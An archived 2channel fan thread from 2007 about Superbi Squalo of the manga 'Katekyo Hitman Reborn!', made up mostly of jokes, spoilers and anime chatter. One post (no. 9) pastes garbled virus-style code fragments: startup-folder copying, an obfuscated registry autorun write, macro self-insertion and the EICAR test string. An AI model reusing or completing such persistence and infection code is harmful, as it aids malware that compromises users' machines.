5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【クソミソ】リボーンのスクアーロはヴオ゛ォイバカッコイイ16【カスども】

1 :名無しかわいいよ名無し:2007/11/20(火) 19:51:00 ID:qD/pv9Yv
ここはWJ連載中『家庭教師ヒットマンREBORN!』に登場する
ボンゴレ独立暗殺部隊ヴァリアー所属の剣士スペルビ・スクアーロのスレです。
全てを洗い流すロン毛の守護者、横柄でドジっ子な彼に思う存分・無理矢理にでも萌えましょう。

・801話はスレ違い
・基本sage進行、落ちすぎたらage
・荒らし、安置は華麗にヌルー 、それが…スクオリティ!!
・バレの場合、スクバレと記入、改行
・下ネタ、アホネタは程々に
・個人サイト晒し厳禁
・次スレは>>980が立てること

落ちないように頑張りましょう。

前スレ
【濁点の】リボーンのスクアーロはヴオ゛ォイバカッコイイ15【申し子】
http://anime2.2ch.net/test/read.cgi/cchara/1191474329/


補足:
スペルビ・スクアーロ[Superbi Squalo](白髪ロン毛男。雨リング所持) = 七つの大罪の傲慢(Pride)
イタリア語で“Superbi(傲慢な、偉大な、高慢な)Squalo(サメ)”

2 :名無しかわいいよ名無し:2007/11/20(火) 19:54:01 ID:qD/pv9Yv
過去スレ
【前髪も】リボーンのスクアーロはヴオ゛ォイバカッコイイ14【願掛けだぜぇ】
http://anime2.2ch.net/test/read.cgi/cchara/1188202210/
【10年後の】リボーンのスクアーロはヴオ゙ォイバカッコイイ13゙【二大剣豪?】
http://anime2.2ch.net/test/read.cgi/cchara/1184477679/
【ヴオ゙ォイ】リボーンのスクアーロはヴオ゙ォイバカッコイイ12゙【ブオ゙ォイ】
http://anime2.2ch.net/test/read.cgi/cchara/1180929683/
【オフクロ思いの】リボーンのスクアーロはヴオ゙ォイバカッコイイ11゙【非行息子】
http://anime2.2ch.net/test/read.cgi/cchara/1179424009/
【待たせたなぁ】リボーンのスクアーロはヴオ゙ォイバカッコイイ10゙【アニメ参戦】
http://anime2.2ch.net/test/read.cgi/cchara/1176903553/
【生きてやがった】リボーンのスクアーロはヴオ゙ォイバカッコイイ9゙【カスザメ先輩】
http://anime2.2ch.net/test/read.cgi/cchara/1173309932/
【感謝する日が】リボーンのスクアーロはうヴオ゙ォイバカッコイイ8゙【必ず来る】
http://anime2.2ch.net/test/read.cgi/cchara/1168934761/
【スクアーロなら】リボーンのスクアーロはバカッコイイ7゙【知ってたかもね】
http://comic7.2ch.net/test/read.cgi/cchara/1163666335/
【鼻に】リボーンのスクアーロはゔお゙ぉいバカッコイイ6゙【北京ダック】
http://comic6.2ch.net/test/read.cgi/cchara/1160140486/
【誇りを】リボーンのスクアーロはゔお゙ぉいバカッコイイ5゙【汚すな】
http://comic6.2ch.net/test/read.cgi/cchara/1158489408/
【脳細胞が】リボーンのスクアーロはヴォ゙ォイバカッコイイ4゙【ねぇーらしい】
http://comic6.2ch.net/test/read.cgi/cchara/1156949810/l00
【やはり】リボーンのスクアーロはヴォ゙ォイバカッコイイ3゙【0%だぁ!!】
http://comic6.2ch.net/test/read.cgi/cchara/1153653379/
【恵みの村雨】リボーンのスクアーロはヴオ゙ォイカッコイイ2゙【ゔお゙ぉい】
http://comic6.2ch.net/test/read.cgi/cchara/1146754509/
【白髪ロン毛】リボーンのスクアーロはエロコワカッコイイ【う"お"ぉぃ】
http://comic6.2ch.net/test/read.cgi/cchara/1139930048/

3 :名無しかわいいよ名無し:2007/11/20(火) 19:54:53 ID:6rcnP3wU
>>1


4 :名無しかわいいよ名無し:2007/11/20(火) 20:22:01 ID:FTYHFTv1
>>1

とりあえず落ち着くべきはスクさんじゃなくてスレ住人の方だったなw

5 :名無しかわいいよ名無し:2007/11/20(火) 20:30:39 ID:dsPtGZf+
>1乙
ひさびさのスクさん語スレタイになったな

6 :名無しかわいいよ名無し:2007/11/20(火) 20:34:04 ID:5dFYXdyy
>>1 乙゛!

7 :名無しかわいいよ名無し:2007/11/20(火) 21:00:57 ID:UO4z3F2B
>>1
う゛お゛ぉつ!
確かに落ち着くべきは住人の方だったなw
みんなのスクさんへの愛ゆえに熱い論争になっちゃったんだな

8 :名無しかわいいよ名無し:2007/11/20(火) 21:19:49 ID:9UWxGS42
>>1

ここの住人がツンデレだということがよくわかった。
普段はツンツンの癖にこういうときは愛に溢れるデレデレ住人達w

9 :名無しかわいいよ名無し:2007/11/20(火) 22:05:04 ID:6SrseIpf
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


10 :名無しかわいいよ名無し:2007/11/20(火) 22:40:08 ID:4nqIjmYS
1乙!!
16スレ目か、、、髪の長さに比例するようにこのスレもどんどん延びてくなぁ、、まぁ良いことだと思うが

11 :名無しかわいいよ名無し:2007/11/20(火) 23:27:01 ID:DtYhTxRY
1乙
自分も前髪だけ願かけ中

12 :名無しかわいいよ名無し:2007/11/20(火) 23:47:01 ID:lWnpQ46N
>>1乙!
スクさんもうすぐアニメにも出るね

13 :名無しかわいいよ名無し:2007/11/21(水) 07:08:10 ID:Y5Vui3V3
前スレのカス☆ザメに噴いたwwwwテラ曖昧3cm?w

14 :名無しかわいいよ名無し:2007/11/21(水) 09:16:38 ID:CNRdWvQZ
前スレの>>999は1000ゲット取りたかったんだろうなww
深夜に潜みすぎワロタwww

15 :名無しかわいいよ名無し:2007/11/21(水) 09:44:38 ID:k3XcdlKq
前スレ>>1000ありがとう
スクさんは幸せ者だよ

16 :名無しかわいいよ名無し:2007/11/21(水) 11:57:58 ID:vHNmZsUn
http://id1.fm-p.jp/16/sweetbaby7/

17 :名無しかわいいよ名無し:2007/11/21(水) 23:22:38 ID:uLA0M5tQ
>>1乙。
スクさんアニメ復活切に願ってるよ

18 :名無しかわいいよ名無し:2007/11/21(水) 23:58:18 ID:0JzPvnEb
1乙!
今更だが初代スレタイはエロコワカッコイイだったんだなww
出てきた当初はバカッコイイ奴だとは思われてなかったんだな…

19 :名無しかわいいよ名無し:2007/11/22(木) 00:14:54 ID:5za34WNM
初登場の回なんかは確かにエロコワな顔してるもんなw
今はそんな面影あんまりないがな

20 :名無しかわいいよ名無し:2007/11/22(木) 09:50:30 ID:zJRC6D4p
今更ながら>>1

21 :名無しかわいいよ名無し:2007/11/22(木) 17:04:27 ID:/boABKPv
まあ確かに雨戦時のスクさんにはエロコワと言える様な色気があった

22 :名無しかわいいよ名無し:2007/11/22(木) 19:28:04 ID:jKMBvtgp
しかし今は

23 :名無しかわいいよ名無し:2007/11/22(木) 19:52:10 ID:ooXt/SiY
クソミソドカスバカッコイイ

24 :名無しかわいいよ名無し:2007/11/22(木) 20:00:36 ID:kEa69+NO
だがそれがいい

25 :名無しかわいいよ名無し:2007/11/22(木) 22:39:21 ID:5za34WNM
いわゆるギャップ萌えという奴です

26 :名無しかわいいよ名無し:2007/11/22(木) 23:16:09 ID:CFTOQnn5
雨の守護者は「人格者」という設定には笑うな。

27 :名無しかわいいよ名無し:2007/11/23(金) 00:10:09 ID:jziYScbp
シャーハッハッハ

28 :名無しかわいいよ名無し:2007/11/23(金) 01:38:06 ID:B0hnwfYM
雨は鎮静とかいうのもびっくりだな

29 :名無しかわいいよ名無し:2007/11/23(金) 01:38:51 ID:WM08Wx3n
スクさんは馬鹿だけど意外と師匠タイプだと思うんだ
雨戦んかいちいち山本に稽古つけてやってるかのようだ・・
それでアレなんだけどな

30 :名無しかわいいよ名無し:2007/11/23(金) 03:30:40 ID:bOC9xIwy
10年で進化した事

カス→クソミソカス

31 :名無しかわいいよ名無し:2007/11/23(金) 03:36:16 ID:jMheQhar
>>30
その10年間の経緯

カス→(日本の病院で出されたミソスープうまかったな・・)→ミソカス
→(なんかみそっかすみたいでアレだな)→(ボス「クソがぁ!!」)→(ソレダ!)→クソミソカス

32 :名無しかわいいよ名無し:2007/11/23(金) 03:48:06 ID:B0hnwfYM
各矢印前後の思考の飛躍w
スクさんはミソスープ美味かったからってミソカス言うようになるのかw

師匠タイプに同意、十年後スクさんが山本の家庭教師になったりしないかな

33 :名無しかわいいよ名無し:2007/11/23(金) 09:27:37 ID:Cqy3Gmfk
初めてリボーン読ませた友達が、スクさん見て
「こいつヴォイヴォイうるせぇのなwww黙ってればカッコイイのに」
って言ってた。

34 :名無しかわいいよ名無し:2007/11/23(金) 09:52:15 ID:2vHH7ihw
黙ってたらスクさんじゃねぇえええええ

35 :名無しかわいいよ名無し:2007/11/23(金) 10:01:36 ID:jziYScbp
確かにな
まぁ結局はスクさんならどんなスクさんでも好きなんだけど

36 :名無しかわいいよ名無し:2007/11/24(土) 03:49:51 ID:jjq9Gkkx
http://23.xmbs.jp/sleepisdrugs/

37 :名無しかわいいよ名無し:2007/11/24(土) 10:57:41 ID:A30FywRM
ちょwwアニメまさかのX'masプレゼントのお知らせスクさんで
サプライズ噴いたww

38 :名無しかわいいよ名無し:2007/11/24(土) 10:58:31 ID:Z2MsDZCX
今日のアニリボ不意打ちだ!
スクさんは出なかったけど、番組プレゼントのナレーションがスクさんだった。
まさかスクさんの口から「クリスマスプレゼント」なんて言葉が聞けるとは思わなかったよ。
アニメスタッフGJ!

39 :名無しかわいいよ名無し:2007/11/24(土) 11:01:40 ID:lYH24a42
CMのときもでたけどプレゼントのやつスクさんがいうと脅迫してるみたいだwww
赤い服来て長い髪の毛顎のところで結んで髭にしてそうだ


40 :名無しかわいいよ名無し:2007/11/24(土) 11:03:01 ID:6E6ZbJWu
スクさんが「クリスマスプレゼント」「宛先」「番組の感想など」ww
そしてみんなのレスの速さにワロタw
スクさんが本誌やアニメで出てきてくれることが一番のクリスマスプレゼントだよスクさん

41 :名無しかわいいよ名無し:2007/11/24(土) 11:07:52 ID:klqScDmg
IDがスク記念柿子

スクさん出るの来年かと思ってたら吹いたwwww

42 :名無しかわいいよ名無し:2007/11/24(土) 11:15:13 ID:Z2MsDZCX
サプライズと言えば、早売りジャンプに書いてあった情報なんで一応
スクバレ










ジャンプフェスタ限定販売でスクさんとベルのグッズがあるって。
箱に入って売ってるあのキャラポスターっぽい。
何としてもゲットだ!
踊らされてると分かっていても踊ってやるぜぇ!

43 :名無しかわいいよ名無し:2007/11/24(土) 12:38:18 ID:f7A6NmbZ
不意打ちスクさん吹いたw
まだ出番ないのに中の人乙ですww

そういやアニメバレスレにタイトル来てたけど、
少なくとも12/15にはスクさん帰ってくるみたいだぞ
早ければ8日の最後あたりに出れそうだけど
ゆりかご回想時の子スクさん見れるのは年明けのようだ

44 :名無しかわいいよ名無し:2007/11/24(土) 13:14:08 ID:6E6ZbJWu
スクバレス?






マジか!なんというクリスマスプレゼント&お年玉、季節感の読めるスクさん
中の人も上手いしどう演じてくれるか楽しみだ

45 :名無しかわいいよ名無し:2007/11/24(土) 18:37:08 ID:bXRgArvm
話の流れ切るんだけど、某野球マンガにスクさんと同じ身長体重のキャラが居て吹いた
しかも、そのキャラと少しスクさんの目つきが似てたしね

しかし、スクさんはあの体重のうち髪の毛がどれぐらい占めてるんだろうか……………

46 :名無しかわいいよ名無し:2007/11/24(土) 19:55:28 ID:88iu2x3M
>>45
その話題、前に自分があっちのスレで出したことあったよ
性格も似てんだよなww
DQN臭いところとかwww

47 :名無しかわいいよ名無し:2007/11/25(日) 07:55:39 ID:6oy36t+9
スクさんに似てる奴結構いるよなw
だがあの口調は見たことねぇw

48 :名無しかわいいよ名無し:2007/11/25(日) 10:41:46 ID:TqLmMFTi
>某野球漫画
野球漫画…?ドカベンか?


49 :名無しかわいいよ名無し:2007/11/25(日) 10:58:45 ID:k5LxBUug
>>48古すぎw
おお振りの榛名だよね?

でもやっぱりスクさんの方が細いような気がするので
あの体重には義手と手袋の重さも含まれてると勝手に思ってるんたが
どうなんだろう

50 :名無しかわいいよ名無し:2007/11/25(日) 12:23:51 ID:nGBOyXHk
スクさんの体重=本体+義手+髪の重さ−脳の軽さ

こんな感じだと思ってた

51 :名無しかわいいよ名無し:2007/11/25(日) 12:33:07 ID:TfGccB9e
人として引かれちゃいけないとこ引かれとるww

52 :名無しかわいいよ名無し:2007/11/25(日) 12:46:39 ID:hjrDkout
人として鮫がブレている

53 :名無しかわいいよ名無し:2007/11/25(日) 12:59:12 ID:t+vg926U
体重から引かれてないものがあったぜぇ


つ【口の軽さ】

54 :名無しかわいいよ名無し:2007/11/25(日) 13:36:11 ID:JHIdzNiT
>>53
結局ザンザスの秘密全部話しちゃったからなww

55 :名無しかわいいよ名無し:2007/11/25(日) 13:48:25 ID:vUzH7sEq
野球漫画がミスフルだと思って、必死に探してたwww

56 :名無しかわいいよ名無し:2007/11/25(日) 18:36:41 ID:FQofW0Cp
>>46
おwまwえwかw
お前とは気が合いそうだなw

>>49
うん。榛名で合ってるよー

>>55
ミスフル……
スクさんと同じ身長のキャラなら結構居たと思うんだけどなー


これ以上他キャラの話題出したら怒られそうだからROMに戻るわ

57 :名無しかわいいよ名無し:2007/11/25(日) 20:27:04 ID:taFBxfB/
話ぶった切るが
動物奇想天外でカスザメでたぞ

食ってたカレー吹きそうになった……

58 :名無しかわいいよ名無し:2007/11/25(日) 20:57:45 ID:JHIdzNiT
>>57
mjdk
クソが!
デブ猫までしか見てねーよ!

59 :名無しかわいいよ名無し:2007/11/25(日) 21:14:09 ID:OjMbcmsa
カスザメ結構可愛かったww

60 :名無しかわいいよ名無し:2007/11/25(日) 21:50:01 ID:vrjqlOr/
あれ・・これは確か・・・って思ってたらカスザメでおー!って叫んでしまったww
でもその更に大きい弟の叫び声に掻き消されたお

61 :名無しかわいいよ名無し:2007/11/26(月) 02:12:16 ID:jVNcRcCc
しかしカスザメと天使が同じ意味になる辺り昔のイタリア人の脳内は難しい

62 :名無しかわいいよ名無し:2007/11/26(月) 02:46:14 ID:qShq4ZWV
銀髪の鮫天使…

ねーよww

63 :名無しかわいいよ名無し:2007/11/26(月) 02:56:45 ID:+NOV/0aj
スクさん→カスザメ→天使→腰布一枚にラッパ→全裸
まで連想した

64 :名無しかわいいよ名無し:2007/11/26(月) 07:53:28 ID:JSlMnqgd
>>63のレス見てたらシカの代わりに鮫でソリーなサンタのスクさん想像した

65 :名無しかわいいよ名無し:2007/11/26(月) 10:23:53 ID:tVkuLyoC
>>64
シカじゃなくてトナカイじゃね?w

むしろスクさんがトナカイ役でボスの乗ったソリを(ry

66 :名無しかわいいよ名無し:2007/11/26(月) 14:28:49 ID:jnGhRmdM
腰布一枚→銭湯でヴァリアークオリティを披露しているスクさんを思いだした
普段は制服かっちり着込んで露出度低いのにいきなり入浴シーンとか
なんというセクシー要員

67 :名無しかわいいよ名無し:2007/11/26(月) 15:05:12 ID:JSlMnqgd
>>65 シカとトナカイって同じじゃなかったっけ

雨戦の濡れ具合もやばかったしセクシー要員だなww
でもドジッ子担当でもあるよね

68 :名無しかわいいよ名無し:2007/11/26(月) 18:16:57 ID:YlWvh82c
全てを兼ね備えたスクさん

足りないのは…

69 :名無しかわいいよ名無し:2007/11/26(月) 18:59:45 ID:7jt5nlrW
>>68
脳ミソのシワと語学力

70 :名無しかわいいよ名無し:2007/11/26(月) 21:00:15 ID:+NOV/0aj
おま!スクさんはあれでも7ヶ国語以上喋れて、若干14歳で古今東西の剣術潰し回って
剣帝倒して次期ヴァリアーのボスだと言われていた…

…そんな頃がスクさんにもありましたよ…

71 :名無しかわいいよ名無し:2007/11/26(月) 22:24:59 ID:wN5KfA9m
そういえば前号のNewtonに鮫特集が載ってたな。
カスザメの写真もあったでよ

72 :名無しかわいいよ名無し:2007/11/27(火) 01:21:31 ID:nm/C3nmj
能ある鮫は牙を隠すんだよ
スクさんも普段はドジっ子担当だったりいじられキャラだったりするけど
いざという時はかっこいいじゃないか

73 :名無しかわいいよ名無し:2007/11/27(火) 01:29:46 ID:JGYlYJXY
>>70
あれスクアーロってそんな凄い人だったっけ?と思ってしまったw

その凄さを感じさせないのがスクオリティ!
>>72の言うとおり、能ある鮫は牙を隠すんだな

74 :名無しかわいいよ名無し:2007/11/27(火) 01:38:50 ID:Izc02ifk
確かに鮫に食われる前のいさぎっぷりのよさアレは男前過ぎ
ボスへのパワハラにも耐える精神力の強さアレもある意味男前だ
そして同僚への鋭いツッコミ
これは普通中々出来ることじゃない

75 :名無しかわいいよ名無し:2007/11/27(火) 07:28:04 ID:ULI7zZ6l
モバ10の今週のお題の『今年の流行語大賞は?』でう"お"ぉいが今の所1位で噴いた

76 :名無しかわいいよ名無し:2007/11/27(火) 12:18:16 ID:6RorZWle
普段は絶対間違えないのに何故か熊ある鮫って読んじまった

77 :名無しかわいいよ名無し:2007/11/28(水) 00:00:04 ID:Izc02ifk
どんな鮫ww

78 :名無しかわいいよ名無し:2007/11/28(水) 00:28:50 ID:O41yTGRz
>>76
「オレはそんな餌に釣られねぇぞぉ!」と言いつつマグロのカルパッチョに引きずられてくスクさんが浮かんだ

79 :名無しかわいいよ名無し:2007/11/28(水) 08:59:14 ID:UIzTyE97
>>78気が合いますな

80 :名無しかわいいよ名無し:2007/11/28(水) 14:02:26 ID:vWkuhbVI
限定ポスターのスクさんは傲慢な感じがして素敵だ

81 :名無しかわいいよ名無し:2007/11/28(水) 15:16:23 ID:kK+3g24P
>>80
…と、見せかけて寝違えて下向けないとか

82 :名無しかわいいよ名無し:2007/11/28(水) 17:23:51 ID:aP7TGx6e
>>81
それでこそカスザメ

83 :名無しかわいいよ名無し:2007/11/29(木) 03:18:49 ID:HyUX1jD3
>>76
http://j.pic.to/pf7mv
自分の部屋にこんなものがある
剣は元々あったおもちゃのやつな

84 :名無しかわいいよ名無し:2007/11/29(木) 09:06:33 ID:dt8p1e0G
流れぶった切ってごめん
スクさんのキャラソン出来た\(^o^)/
しかし元ネタから余り改変していない


傲慢ライフ・リターンズ


カス「う"お"ぉい…!?この気配は!?」
カス「穏やかなる俺の日常はある圧倒的な存在によって激変した!!」

止めとけと言うべきか どうせ徒労だろ
返事など聞いちゃいねぇ 無駄にブハるなよ
カス「滑るぞぉ」
それよりも眠たくて もっと寝ておくれ
カス「寝るな、まだ前半だぞぉ!」
鮫エナジー大切に すぐに呼び出しさ
カス「う"お"ぉい、急げぇ!」
あ"ー…なんでいつも 危険値大好調
カス「爆発寸前!」
あ"ー…逃げる前に 悪夢がやってくる
ボス「早く行けカス」
カス「う"お"っ!?」
天丼を詰めるなよ 俺は普通に食べれる!
カス「そうだぁ!!」
納豆とかいいから 本気でいいから
ボス「何言ってやがる」
ツッコミは偉大だって 学んだ自分褒めよう
カス「よくできましたぁ!」
コオォされたときは すぐに…諦めろ
カス「だと思ったぜぇ…」

85 :名無しかわいいよ名無し:2007/11/29(木) 10:00:17 ID:6GN2AJD7
> 天丼を詰めるなよ 俺は普通に食べれる!
やべぇスクさんてキョン似合うww

86 :名無しかわいいよ名無し:2007/11/29(木) 17:24:36 ID:u0zhI0ix
>>83
この剣もしかして
薔薇水晶の持ってるやつじゃね?

87 :名無しかわいいよ名無し:2007/11/29(木) 21:13:02 ID:a85QouRl
>>83
かわいいなw

88 :名無しかわいいよ名無し:2007/11/29(木) 22:52:53 ID:HyUX1jD3
>>86
うん。薔薇水晶のやつだよ
銀様も居るんだけど、剣を失したからこっちの方にした

しかし、よく気づいたなw

89 :名無しかわいいよ名無し:2007/11/30(金) 16:41:33 ID:CQObQ8cP
しかしスクさん銀様と被るとこ多いなww

90 :名無しかわいいよ名無し:2007/11/30(金) 16:42:56 ID:smkiQZ8v
ゔお゙ぉい 乳酸菌摂ってるかァ
クソミソお馬鹿さんども!!

91 :名無しかわいいよ名無し:2007/11/30(金) 19:28:16 ID:nYfiya6L
乳酸菌って味噌にも入ってなかったっけ
最近は銀様見てるとスクさん思い出して笑ってしまう

92 :名無しかわいいよ名無し:2007/11/30(金) 22:51:32 ID:ix+P92s9
あさりにあるカスさん家系図に銀様加えて欲しい

93 :名無しかわいいよ名無し:2007/11/30(金) 22:55:53 ID:ix+P92s9
あ、ID末尾がスクktkr!

94 :名無しかわいいよ名無し:2007/11/30(金) 23:03:47 ID:nnBYTHHG
金玉白ッ

95 :名無しかわいいよ名無し:2007/11/30(金) 23:04:58 ID:nnBYTHHG
誤爆すまん

96 :名無しかわいいよ名無し:2007/11/30(金) 23:20:34 ID:cKv7By13
なんという誤爆www牛乳吹いたwww

97 :名無しかわいいよ名無し:2007/11/30(金) 23:44:49 ID:nYfiya6L
凄い誤爆www何の話してたんだwww

98 :名無しかわいいよ名無し:2007/12/01(土) 02:46:02 ID:dfwK4/nU
言っておくが金玉は白くねーぞwww

99 :名無しかわいいよ名無し:2007/12/01(土) 05:01:20 ID:LtZN74Bb
スクさん家系図に銀様来てたw

100 :名無しかわいいよ名無し:2007/12/01(土) 09:11:13 ID:E1aq4iG3
スクさんの金玉は白くないはず…!

101 :名無しかわいいよ名無し:2007/12/01(土) 10:13:56 ID:FE0Ej+1P
やめれw

102 :名無しかわいいよ名無し:2007/12/01(土) 10:58:55 ID:1Gqugxoh
先週見逃した奴のためにもう一度プレゼントのおしらせ教えてくれるスクさんワロスwww

103 :名無しかわいいよ名無し:2007/12/01(土) 10:59:31 ID:DwX2ATkM
アニメにスクさんの足と後ろ姿きた
あいつ優しすぎるもう一回プレゼントのお知らせしてったぞ

104 :名無しかわいいよ名無し:2007/12/01(土) 11:00:08 ID:ru7SSchz
スクさんまたクリスマスプレゼントのお知らせしてたww
わざわざもう一回言ってくれるなんて親切すぐるw
つかアニメスクさんの足だけ登場しやがったw

105 :名無しかわいいよ名無し:2007/12/01(土) 11:02:01 ID:dfwK4/nU
アニメの最後地味にスクさん登場したな
てか見逃したヤツのためにもう一度って優しいww

106 :名無しかわいいよ名無し:2007/12/01(土) 11:22:31 ID:jDZEoh0R
スクさんの荒い優しさが五臓六腑に染み渡るw

107 :名無しかわいいよ名無し:2007/12/01(土) 14:14:19 ID:1Gqugxoh
そういえばベルの独り言でもスクさん出てたのに
それについては一言もレスが無い件ww

108 :名無しかわいいよ名無し:2007/12/01(土) 15:35:47 ID:pNraD670
お知らせとかDVDに入らないのが口惜しすぎる…買わんけど
鮫サンタ優しくて吹いた

109 :名無しかわいいよ名無し:2007/12/01(土) 20:15:49 ID:63jlIB/U
KYな自分参上。サンタ鮫豚切ってスマソ
今更FR骸強襲をクリアした。スクさんが現代で既に剣帝になってる件…じゃあやっぱ10年後剣帝もスクさんなんだね多分

110 :名無しかわいいよ名無し:2007/12/01(土) 20:33:42 ID:GSGf7YUA
ルッスーリア三丁目のスクさんの常識人っぷりが好きだ

111 :名無しかわいいよ名無し:2007/12/01(土) 21:31:48 ID:2nUK60aU
>>109
あのてのゲームは信用しない方が……。

まぁそれでも特に矛盾が起きないから間違いとも言い切れないわけだけど。

112 :名無しかわいいよ名無し:2007/12/01(土) 22:04:24 ID:FtYfs7Yr
スクアーロってイタリア人?

113 :名無しかわいいよ名無し:2007/12/01(土) 22:09:14 ID:nSgIZhTN
>>112
イタリアーノです


114 :名無しかわいいよ名無し:2007/12/01(土) 22:12:42 ID:GSGf7YUA
出身国イタリアだからイタリア人じゃない?
ちなみに好きな食べ物はマグロのカルパッチョ

115 :名無しかわいいよ名無し:2007/12/01(土) 22:21:52 ID:E1aq4iG3
キ/タ/ユ/メっていう国擬人漫画に出てくるイタリアーノを見たあとにスクさんをみると
本当にこいつはイタリアンなのかと疑いたくなるんだぜ(ちなみにディーノは結構当てはまる)


116 :名無しかわいいよ名無し:2007/12/01(土) 23:04:51 ID:2nUK60aU
イタリアは成り立ちから都市毎の自立性強いから生まれによって結構違うぞ。
日本人だって東北人と大阪人じゃやっぱり違うしな。

117 :名無しかわいいよ名無し:2007/12/01(土) 23:19:16 ID:J1cmj26/
んだんだ日本にも青い目の人が0.2パーセント程いるように
イタリアにもゲルマン系イタリア人がいるんだからスクさんも可笑しくないよ
っていうか性格はもろイタリアンだよなスクさん

118 :名無しかわいいよ名無し:2007/12/01(土) 23:50:28 ID:ru7SSchz
ただあのダミ声にあの口調じゃ女の子は口説けないだろうがな

119 :名無しかわいいよ名無し:2007/12/02(日) 00:01:17 ID:DwX2ATkM
スクさん「う゛お゛ぉい!今暇かぁ!」

逃げ去る女性
(べ、べつに、私が残ってあげてもいいんだからっ!)

120 :名無しかわいいよ名無し:2007/12/02(日) 00:11:33 ID:fBIhGAHD
スクさん「う゛お゛ぉい!そこの女ぁ!」
女性(ヒィ!強盗!!)
通行人「通報しますた」

121 :名無しかわいいよ名無し:2007/12/02(日) 01:20:30 ID:KWwFXq5o
>>109
スクバレス?










来週でてくるミルフィの新キャラが二刀流の剣士っぽい
バレスレでは未来の剣帝はこいつじゃないかと話題になってる
剣士キャラってことは山本はもちろん、そのうちスクさんともドンパチするのかな

122 :109:2007/12/02(日) 20:31:13 ID:Hrgduhve
>>121バレス?










確かに数ヵ月前のゲームだが…
だとしたらキャラクターカードのリボーンの台詞で「剣帝スクアーロの〜 とあったのは何だったんだろwww

123 :名無しかわいいよ名無し:2007/12/02(日) 21:00:08 ID:Gn+bBZs4
スクバレス?









ジャンプ買ったけど剣帝ってイメージのキャラじゃなかったけどな
と思うのはスクさんが剣帝であって欲しいからかもしれないけどさ

124 :名無しかわいいよ名無し:2007/12/03(月) 16:45:45 ID:DkOePCmt
バレ解禁だよね
自分も麿は剣帝ってイメージじゃないなと思った
けど雰囲気で剣帝になれるわけじゃないから
あれがそうなんだと言われたら納得するしかないが
スクさんが剣帝だったらいいなという欲目もあるし
というかそもそも剣帝って何なんだ


ナルトで鮫キャラが出てきて、
改めて我らがカスザメの異常なほどのかっこよさを実感した

125 :名無しかわいいよ名無し:2007/12/03(月) 17:35:45 ID:O7y7q3oM
>>122
現代の山本に負ける時点まではスクさんが剣帝だったんじゃない?
でもやっぱり雨戦の時に自他共に誰もカクさん=剣帝とは言わなかったしなー
テュール倒しても剣帝の称号は何らかの理由で引き継がなかったのかね

そもそも剣帝の称号がどうやってつくのか謎なんだけどさ
あの麻呂眉毛が剣帝にしろ違うにしろどっかで説明欲しいな

126 :名無しかわいいよ名無し:2007/12/03(月) 17:39:31 ID:O7y7q3oM
誤字ったスマン
スクさんを黄門様のお供の人にしちゃったorz

とりあえず、お銀=ルッスでお願いします・・・

127 :名無しかわいいよ名無し:2007/12/03(月) 18:05:08 ID:PJ7keiYu
>>126
カスさんとスクさんが混じったのかw
腹筋割れてしまったじゃないかwwww

剣帝倒したら剣帝になるんだとしたら、カスさんが剣帝なんだろうけど、
天野がキャラブックにも書いてないから違うかもね。

太猿が「ボンゴレには二大剣豪が居る」とは言ってたけど

128 :名無しかわいいよ名無し:2007/12/03(月) 19:11:52 ID:AGHLfvSO
>>126
自分もカクさんハゲワロタw
スペルビ・カクアーロwww

129 :名無しかわいいよ名無し:2007/12/03(月) 20:00:41 ID:Iexi5CgS
麿は昔剣帝スクさんに敗れて、その復讐とかはないかなぁ

130 :名無しかわいいよ名無し:2007/12/03(月) 21:49:26 ID:O7y7q3oM
>>127
いや、違うんだ。カスとスクが混じったんじゃなくて
かな打ちだから、スの隣がカで打ち間違えたことに気づかなかったんだ〜
ちょっとアニメにスクさんが再登場するまでタイピング練習してくるわ

131 :名無しかわいいよ名無し:2007/12/03(月) 22:09:06 ID:DkOePCmt
カスクさんwww
>>129
燃える展開だ…是非見てみたい
だが実際は剣帝の説明とか描写とかないまま
この時代の剣帝キター戦うぞー強いぞーワイワイ
と進みそうなイメージ
まあスクさんが活躍してくれる燃える展開ならそれでいい

132 :名無しかわいいよ名無し:2007/12/03(月) 22:37:35 ID:LprZHerz
麿って正一のところだから日本だよね?
とりあえずヴァリアも日本こんかな・・・

133 :名無しかわいいよ名無し:2007/12/03(月) 22:41:38 ID:rIXI4vzD
ネタバレ















麿はバジルの10年後の姿

134 :名無しかわいいよ名無し:2007/12/03(月) 22:58:43 ID:lzLRV3/i
>>133
バレス。



・・・スレチじゃないか?
てか、・・・うそだろー。ないわー


135 :名無しかわいいよ名無し:2007/12/04(火) 00:13:54 ID:6D5V+n4b
スクさんとうちの父上の血液型と誕生日が一緒なのにいまさら気がついた
なんかこう、じわじわくる感じだ…

136 :名無しかわいいよ名無し:2007/12/04(火) 00:32:11 ID:sg3mvE59
ってことは星座も誕生石も誕生花も同じってことじゃないか
ついでに持田先輩とも同じってことじゃないか
父ちゃん大事にしろよ

137 :名無しかわいいよ名無し:2007/12/04(火) 11:30:50 ID:93RlA3AE
>>135は未来のスクさんの娘

138 :名無しかわいいよ名無し:2007/12/04(火) 12:47:15 ID:NG6wNWHl
スクさん、10年後って子供いてもおかしくない年齢だよね

139 :名無しかわいいよ名無し:2007/12/04(火) 15:31:10 ID:mGMQZPMk
まあそこはジャンプ漫画だし子供とか嫁は出ないだろうね
いい加減ディーノ辺りは子供居ないとマズイと思うけどそこはスクさんだし
子供が居たら名前はキャビアでいいよ

